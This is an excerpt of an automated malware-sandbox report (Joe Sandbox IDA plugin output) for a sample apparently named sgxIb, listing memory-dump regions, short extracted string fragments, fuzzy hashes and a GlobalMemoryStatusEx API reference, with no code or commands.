                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq$\Ocq
                                        • API String ID: 0-3575482020
                                        • Opcode ID: f4ed9b10f2a4c39463f6877633bdccab53d7a771d4481ac6a4c034ef0325cccb
                                        • Instruction ID: 3d32d4191a3020fa0099b0f0e23bf7937a68f05b1802d486000bfa34af108c84
                                        • Opcode Fuzzy Hash: f4ed9b10f2a4c39463f6877633bdccab53d7a771d4481ac6a4c034ef0325cccb
                                        • Instruction Fuzzy Hash: 14619D30F002099FEB55DFA9C8547AEBBF6FBC8750F208429D10AAB394DB758D458B91

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: 90a49d21e423748856d0c01fd1fc86d09b04114c36087b672a68c735dce09f3b
                                        • Instruction ID: ba7121169cc946f14a579be2851c97309228873e9cc8327a7669d0bc2ca86ae6
                                        • Opcode Fuzzy Hash: 90a49d21e423748856d0c01fd1fc86d09b04114c36087b672a68c735dce09f3b
                                        • Instruction Fuzzy Hash: 1D91AC31F002068FDB54DB79EA5066EB3E6FF84284F148428D81ADB394DF75EC868B81

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (&^q$(bq
                                        • API String ID: 0-1294341849
                                        • Opcode ID: e938070a07280e2b161aa8749fec924ef5a3b08120361ce236b985a2b867f2e9
                                        • Instruction ID: 155dcecab276a7dde4d4e6ca9608d5b047daf6399468f729dae32aa308d82abb
                                        • Opcode Fuzzy Hash: e938070a07280e2b161aa8749fec924ef5a3b08120361ce236b985a2b867f2e9
                                        • Instruction Fuzzy Hash: 38517F31F002198FDB55EFB9C85069EBBF2AF84740F248569D405AB384DE34AD46CB91

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: 19f1f6447fedbce45d932fcc3c147a49ecf517b3a4eb5a7e02ea8958ccbaa17d
                                        • Instruction ID: e2e62ef5bf544636250c3eeeec81cf06dad2258acb90f048bb9294990dd40ba1
                                        • Opcode Fuzzy Hash: 19f1f6447fedbce45d932fcc3c147a49ecf517b3a4eb5a7e02ea8958ccbaa17d
                                        • Instruction Fuzzy Hash: 7F514F70B00206DFDF54DB68E9A076EB3FAEBC8644F108469C409DB394DA74DC428B95

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq
                                        • API String ID: 0-936005338
                                        • Opcode ID: 77bd25fa12c75d9a6a9a2d747896879663a5bbddcb7f5be4f550185fa95ac612
                                        • Instruction ID: 3b68fa1e89031d714a174cbb0cba3e2c3f3e8d8c8346974cd760af0f81244aae
                                        • Opcode Fuzzy Hash: 77bd25fa12c75d9a6a9a2d747896879663a5bbddcb7f5be4f550185fa95ac612
                                        • Instruction Fuzzy Hash: 26517F30F002199FEB55DFB9C854BAEBAE6FBC8710F208529D106AF395DA758C018B91

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: 099326586df2d6cb92efd3c09a96c2cdc9a294232d54e36159b1fb9e5a55b02e
                                        • Instruction ID: 46d54e28331b9813869e2192194632736c8bc442715f92fad4aadd5cdce968e0
                                        • Opcode Fuzzy Hash: 099326586df2d6cb92efd3c09a96c2cdc9a294232d54e36159b1fb9e5a55b02e
                                        • Instruction Fuzzy Hash: BFC1A975F002198FDB54EFA4C49869EB7F6FF88364F208469D806AB354DA31DD42CB91

                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0302EEBF
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1960997574.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_3020000_sgxIb.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: d7a3897c9995bce0023dc20ee3042eb56363ba005898c097353ad8fe6f97fae7
                                        • Instruction ID: 4cd0cb0233666440e9fb8027f0a96d0ccc0ceff2a7fc99fcc743727a869197d4
                                        • Opcode Fuzzy Hash: d7a3897c9995bce0023dc20ee3042eb56363ba005898c097353ad8fe6f97fae7
                                        • Instruction Fuzzy Hash: CF2178B1C006698FDB10DFAAD4447DEBBF5EF48320F148A6AD458A7290D7789981CBA1

                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE ref: 0302EEBF
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1960997574.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_3020000_sgxIb.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: a41e5872f8cbeb975674f727eefed502c9d582a696d4b0e088e5e85aac994cdc
                                        • Instruction ID: 83c7942ecdaa0aabd2be333466f5a1b14b3e56333d1678ae235290cf84f42cca
                                        • Opcode Fuzzy Hash: a41e5872f8cbeb975674f727eefed502c9d582a696d4b0e088e5e85aac994cdc
                                        • Instruction Fuzzy Hash: DD11F0B1C006699BCB10DF9AC544BDEFBF4AF48320F14816AD858B7251D778A944CFA5

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: fd761be782946720f12f110c1cd7e85bc8e82e647316b96052995f67d4425dc8
                                        • Instruction ID: 664d5e00f12181662cbb85d1008e27b79867052ba87701158d2638154b42dfd1
                                        • Opcode Fuzzy Hash: fd761be782946720f12f110c1cd7e85bc8e82e647316b96052995f67d4425dc8
                                        • Instruction Fuzzy Hash: D5815775E002199FDB05DFA4C994ADEBBF2BF88724F208169D406BB354DA31AD42CB91

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: a809bd6f61669f2e957867c8b3a41e331debad93eb5d4b0a5501d4e656535175
                                        • Instruction ID: 76f3613b7f0248149db89ff701d7623b3b3d51e4f09d7d5575c69169b5d0a7ba
                                        • Opcode Fuzzy Hash: a809bd6f61669f2e957867c8b3a41e331debad93eb5d4b0a5501d4e656535175
                                        • Instruction Fuzzy Hash: 1F715975E002199FDB05DFA4C954ADEBBF2BF88724F208169D405BB394DB31AD42CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: d4b8ae742e600933926827bc4bdb1bbddf58d41e121d936616ad9a8ec7f2a30e
                                        • Instruction ID: 80581e1d3826d5766a0ba338d7f61be4511e243dd717afeace9c28cc9f813929
                                        • Opcode Fuzzy Hash: d4b8ae742e600933926827bc4bdb1bbddf58d41e121d936616ad9a8ec7f2a30e
                                        • Instruction Fuzzy Hash: 1241C031F102058FEF956AB494647AE77A2EBC8224F24486AD406EB3C4EE34DD82D791
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: a2a969f3dabca2d2bcd73eff19d293277ee834f20c6e19eb9d37a2d7f2e7eb99
                                        • Instruction ID: 7a4d570d4245304ca11c293e750313f6e22923ed02a9ef23a8669fef4df1b227
                                        • Opcode Fuzzy Hash: a2a969f3dabca2d2bcd73eff19d293277ee834f20c6e19eb9d37a2d7f2e7eb99
                                        • Instruction Fuzzy Hash: CE419F71E0030A9FDB65DF65C89469EBBB2FF85280F144929D405EB240DB75E946CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: 7c80778be5f3a02835f01f24628a0e025cfd5e4a910371de24641b9c3f267c19
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fdc3c3c0a49fd462fc17a28ff8b3911d987e494c7daa11dfd2dcd2d7b3f24975
                                        • Instruction ID: 941afb2bf220fdf0932a0a7f0dc339c9cb0c39b891c7512e1ee78cd383a27329
                                        • Opcode Fuzzy Hash: fdc3c3c0a49fd462fc17a28ff8b3911d987e494c7daa11dfd2dcd2d7b3f24975
                                        • Instruction Fuzzy Hash: A2216D75F002159FDB50DF7AE944AAEBBF9EB88750F108025E905EB380EB35DD418BA1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d6305c7743d4f32d257c8717251e66e3d6e120a255d7a9f13964d062f3e9674
                                        • Instruction ID: 1bf8bffaaaa21472c6f3339176642019de1ed37566b03618f7e2186b8996c080
                                        • Opcode Fuzzy Hash: 4d6305c7743d4f32d257c8717251e66e3d6e120a255d7a9f13964d062f3e9674
                                        • Instruction Fuzzy Hash: D0215E71D1075ACBDF65CFA9C84069EBBB5FF85350F10492AE809EF250E7719846CB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4c608d4d16e17c46c3c88df4503744e7fa41f1be219646a24c8459886758c13
                                        • Instruction ID: 627940f2075fdad1004ec9208a280aa7430801b870b0491e90fdc7ea77c37631
                                        • Opcode Fuzzy Hash: a4c608d4d16e17c46c3c88df4503744e7fa41f1be219646a24c8459886758c13
                                        • Instruction Fuzzy Hash: FD21AF30F101099BDF94DB69E85469EBBB7EBC4390F148535E409EB340DB31ED828B85
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e04c8e5cfbe852c1bbc3ad949baae8745c3f7a409c7d2d0548b2a454190e7b2
                                        • Instruction ID: 7b03bfce858cb1e748122510b8c9c728189a55f7d3d5a1339b5e2077d555ffe0
                                        • Opcode Fuzzy Hash: 9e04c8e5cfbe852c1bbc3ad949baae8745c3f7a409c7d2d0548b2a454190e7b2
                                        • Instruction Fuzzy Hash: 982124B1D01218DFCB50DF99D884BDEFBF4EB49320F14806AE808AB251D3749A44CFA4
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d87436c064333aeb20c92ef31be7902e4a1f6f41eb0bc277ebce7ba8f2829ad7
                                        • Instruction ID: 46aac7c8a586ebab60a574eae820f97a0f187bb3eda25224e361f7dc483d6ca7
                                        • Opcode Fuzzy Hash: d87436c064333aeb20c92ef31be7902e4a1f6f41eb0bc277ebce7ba8f2829ad7
                                        • Instruction Fuzzy Hash: 75110272E002185FCF64DB79C8405DEFBB6EF89750F1445AAD406EB240EA31DA42CBE1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74e35dcd6898573bc2b990c8c5909344ab2ea1649c951a35e902eb9e1abe64e9
                                        • Instruction ID: bbd0b188466d6bd9443aada99f5ff8911a53f4118e3a441d7dfa9a1e693501d9
                                        • Opcode Fuzzy Hash: 74e35dcd6898573bc2b990c8c5909344ab2ea1649c951a35e902eb9e1abe64e9
                                        • Instruction Fuzzy Hash: 66118E32B041289FDB559668DC146AE73FBEBC8350B008439C50EEB340EE35DC028B91
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9adb3588d92273d2669da8d0da7a13d22b5c2ae8e7b9490bd8de85e535fff49a
                                        • Instruction ID: 4c6e6c8c65547a0885bc7adc3c135283b106eda7537f3781626eaca01b4cecb4
                                        • Opcode Fuzzy Hash: 9adb3588d92273d2669da8d0da7a13d22b5c2ae8e7b9490bd8de85e535fff49a
                                        • Instruction Fuzzy Hash: 652103B5D01219AFCB00DF9AD884ACEFFB8FB49320F10812AE518B7200C374A954CFA5
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cfca82bdbd7e6da2dcd8de44d06b0a1493bdaad236cb2d3bbeac36ddb1ee997
                                        • Instruction ID: 43f0d4c750eab5e4e92a74529af7e1fbca1051f3d59887fb3b6b21bfc70f3dcd
                                        • Opcode Fuzzy Hash: 0cfca82bdbd7e6da2dcd8de44d06b0a1493bdaad236cb2d3bbeac36ddb1ee997
                                        • Instruction Fuzzy Hash: B901FD31F100111FDB6486AEA411B6FA3DBDBCA764F20883AE50ECB384D925DC0303A5
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 997b20001844d46ce1f06689d94bea414614ac5fc011fc8c8d4a098ef0622b2f
                                        • Instruction ID: c083ad918d21f638d6f64556808144cdff63bb21eb71809d5aa340c1573f5449
                                        • Opcode Fuzzy Hash: 997b20001844d46ce1f06689d94bea414614ac5fc011fc8c8d4a098ef0622b2f
                                        • Instruction Fuzzy Hash: C31153B2800249DFDB10DF99C849BEEBFF5EB48320F148419E958A7250CB39A950DFA1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f8221b8afef1d28eae48f7819d8a7f77a7161e222c7793bd5423fdf444a3d45
                                        • Instruction ID: c59c6eda00156c99774c1d805df37917552ad21a95254f25d3139cf239070527
                                        • Opcode Fuzzy Hash: 4f8221b8afef1d28eae48f7819d8a7f77a7161e222c7793bd5423fdf444a3d45
                                        • Instruction Fuzzy Hash: 0601D432B141145BDB999578DC146EF32EB9BC8350F004636D41EEB280EE248C0247D1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c19cc5882ed53ccd5b5f8c368f76680e40a7a213b7607dc5db2718d9afaad38
                                        • Instruction ID: d87ac9ff53b9f54050fd5605d31bbfde57f6394b394c2c209c935d6abf2115eb
                                        • Opcode Fuzzy Hash: 6c19cc5882ed53ccd5b5f8c368f76680e40a7a213b7607dc5db2718d9afaad38
                                        • Instruction Fuzzy Hash: 6011B0B5D01659AFCB00DF9AD884ADEFFB4FB49320F10812AE918B7240C374A954CFA5
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f414a5e898a01b3c223406dc09046d6fa3117c456a0f4a370faddbe6cf55162a
                                        • Instruction ID: 30d9893f5927dfffacbf2b3eb24350c0210db7d6230a4c11f85ac0af03e733cc
                                        • Opcode Fuzzy Hash: f414a5e898a01b3c223406dc09046d6fa3117c456a0f4a370faddbe6cf55162a
                                        • Instruction Fuzzy Hash: 2F01DC30F100111FDB6496AEA411B2FA3DBDBCA764F20883AE50ECB394DA65DC0343A5
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07ddd757ec7115707329ab226aee633b6fd2860c6a4f3b4b102f8294436cc95e
                                        • Instruction ID: 88fffa3ec188d8a52a5c19093263971ab54f63d41f61356fae36ddd99b1f3448
                                        • Opcode Fuzzy Hash: 07ddd757ec7115707329ab226aee633b6fd2860c6a4f3b4b102f8294436cc95e
                                        • Instruction Fuzzy Hash: 9001FF30F100101BCB65DABDE45072FA7DADBC9624F108839E40ECB340EE21DC034396
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 523caac14452cab331e7a326a87213baaf2c4a3471a1d6ba81ec46299940d323
                                        • Instruction ID: 4dd0adbf572671eb6fe921ae43bd707feac2b08108a7e597d80620b4709df9d7
                                        • Opcode Fuzzy Hash: 523caac14452cab331e7a326a87213baaf2c4a3471a1d6ba81ec46299940d323
                                        • Instruction Fuzzy Hash: 7401AD30B01115AFDB60DA7DF858B6AB3DAFB89664F108439E10ECB360EE25DC4287C1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b297546c1097d5db1ecdc219bab7fd30a9983fbb3659037bc0b9875ead32e44c
                                        • Instruction ID: a2936a699cc6ce17ada55cb2b683756d8a89c586278e5b98aaaf81489417f9e4
                                        • Opcode Fuzzy Hash: b297546c1097d5db1ecdc219bab7fd30a9983fbb3659037bc0b9875ead32e44c
                                        • Instruction Fuzzy Hash: C6018130B011159FDB64D67DE45475AB3DAFB89664F108439E10ECB360DE25DC428785
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14e6b809a7b8ded83b57c96d48e656a1d7a3b4f4e5791a44e7c5f92db4c9d0ce
                                        • Instruction ID: 56f279c0697680112e1825079042cb7d27a440066097ad33be322b7234ded2d7
                                        • Opcode Fuzzy Hash: 14e6b809a7b8ded83b57c96d48e656a1d7a3b4f4e5791a44e7c5f92db4c9d0ce
                                        • Instruction Fuzzy Hash: A5018B30B011119FDB60DA7DA45875AA7DAEB89224F108939E11ADB3A0DE25DC428781
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 447b3dfe8b42fdf320acae92c20a1f9f7bdb58545efc90dab0772c641556dbaa
                                        • Instruction ID: ab41ca399c7ac3ae43d00094a8ee85fea05fbc82c571a3d82556f6ffac1868bd
                                        • Opcode Fuzzy Hash: 447b3dfe8b42fdf320acae92c20a1f9f7bdb58545efc90dab0772c641556dbaa
                                        • Instruction Fuzzy Hash: 4A012631F102249BCF54DA79EC5069EBB76FB80364F000639E811EF284DA2A9C45CBC0
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a69cd213fa437f3c41eaeb433d4c19043e8e046b3b118200fbf7cb2b171bfda
                                        • Instruction ID: 91c36297b6dd32d16df598065487d2718bf15154ea3aecf52d8f74d3d7319ba1
                                        • Opcode Fuzzy Hash: 2a69cd213fa437f3c41eaeb433d4c19043e8e046b3b118200fbf7cb2b171bfda
                                        • Instruction Fuzzy Hash: 69F08135B011199FDB00DBA9D840BDE77F1FB88322F148561E519A72D4C634D8118BA0
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ddf11dfc0567400d437dfc0d7414ad6981a7c2878eb801fcf92f05d96db9122e
                                        • Instruction ID: 6e5a2ce2787324cc9ed1fbad469fd54a03cb1766251b78410841f1a91ef63432
                                        • Opcode Fuzzy Hash: ddf11dfc0567400d437dfc0d7414ad6981a7c2878eb801fcf92f05d96db9122e
                                        • Instruction Fuzzy Hash: 8AF082363002197F9F45AE999C159AF7FABFBC8360B004429FA0DD7290DB31892197A5
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b888c06bc6d8e82615bb55d8557f5cc33668630eea32e24c6d0ed471c2f6d66
                                        • Instruction ID: b0f09d1c482ad59e5f2a634b0403a41f0856f37fe531e181e903d6f74791cc0d
                                        • Opcode Fuzzy Hash: 8b888c06bc6d8e82615bb55d8557f5cc33668630eea32e24c6d0ed471c2f6d66
                                        • Instruction Fuzzy Hash: 8BE092B1D15248AFDF60CA78CD0579A7BA99B06244F1144A6D804DF24BE175CE018792
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2898320219df3c1182aeab215189d6953e411df2ecbb36bedb785bddfd084a6
                                        • Instruction ID: a2d5d3c3dae2bf7aca79ee5b26bec24cd8b52dae81cb27dd12cdd81e7cede26b
                                        • Opcode Fuzzy Hash: c2898320219df3c1182aeab215189d6953e411df2ecbb36bedb785bddfd084a6
                                        • Instruction Fuzzy Hash: 35E04FB2E003199FAB90DFBA9D016AE7BF9EB49650F108475D909E3240FA71C6009BD1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975407526.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f00000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dc7a68a8a01b5c4d92d246bc8f27fdf0baac86b9df0d82260f1bc68d40d7dbd7
                                        • Instruction ID: 3bb5e544bdeb5aa912f7b27a53ea625a3ba3c72caf90c28af91170be52c08128
                                        • Opcode Fuzzy Hash: dc7a68a8a01b5c4d92d246bc8f27fdf0baac86b9df0d82260f1bc68d40d7dbd7
                                        • Instruction Fuzzy Hash: B0E0C23AF102319F2EA0E66964A41ADB781E7C816432041A6CA19CB244DE268E0347D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2222239885
                                        • Opcode ID: 53cce3fef84aa084743ebe8d93106039c171635186f682b70500afc9e668f873
                                        • Instruction ID: 10da2f8d95051102de76db03fcf973bb873d3e5e84957494bdf82674e08e4a48
                                        • Opcode Fuzzy Hash: 53cce3fef84aa084743ebe8d93106039c171635186f682b70500afc9e668f873
                                        • Instruction Fuzzy Hash: E2120D30E002198FDB68EF69D954A9EB7F6BF88344F2085A9D409AF354DB319D85CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1975544177.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_6f10000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
